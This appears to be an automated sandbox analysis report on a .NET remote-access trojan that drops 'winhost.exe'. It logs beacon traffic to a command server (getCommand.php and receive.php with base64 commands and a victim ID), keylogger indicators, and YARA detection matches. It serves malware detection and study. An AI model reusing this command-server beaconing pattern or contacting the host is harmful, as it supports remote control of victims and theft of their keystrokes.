                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651567513.000000001BED7000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651132557.000000001BED7000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersP
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.647017703.000000001BECF000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com8
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: unknownDNS traffic detected: queries for: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Contains functionality to log keystrokes (.Net Source)Show sources
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: winhost.exe.0.dr, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 8.0.winhost.exe.720000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 8.2.winhost.exe.720000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: winhost.exe.12.dr, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 19.0.winhost.exe.160000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout
                  Source: 19.2.winhost.exe.160000.0.unpack, svchost/Other/LimeLogger.cs.Net Code: KeyboardLayout

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
